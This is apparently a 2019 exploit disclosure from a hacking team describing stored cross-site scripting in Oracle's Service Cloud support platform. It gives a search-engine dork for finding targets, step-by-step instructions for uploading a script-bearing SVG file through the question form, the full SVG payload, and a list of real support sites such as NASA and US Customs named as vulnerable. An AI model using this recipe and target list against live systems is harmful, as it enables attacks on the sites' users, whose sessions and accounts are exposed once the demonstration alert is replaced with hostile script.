# [+] Title : Oracle Integrated Support Platform Service XSS Vulnerability
# [+] Author (Discovered by) : Zunfix
# [+] Team: TurkHackTeam
# [+] Vendor: cloud.oracle.com/service-cloud
# [+] Date : Jul, 10th 2019
# [+] Dork : inurl:/app/answers/list

# [+] Poc : 
        + We have to dork in search engine
        + We create an account on the vulnerable site [Register path: /app/utils/create_account]
        + We go to the Ask a question page and add and send the svg file containing the exploit code [Question page: /app/ask]
        + We go to the support history page and go to the question we asked from the list [History page: /app/account/questions/list]
        + We open the exploit svg file that we added from our question page
        + Exploit code running [Exploit code: <script>alert(123)</script>]

# [+] Svg file source code containing exploit : 
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script>
alert(123)
</script>
</svg>

# [+] Vulnerable Sites E.g :
        + answers.nssc.nasa.gov
        + help.cbp.gov
        + supportcenter.ieee.org
        + support.us.playstation.com
        + support.en.kodak.com
        + eng.faq.panasonic.com
        + kb.sandisk.com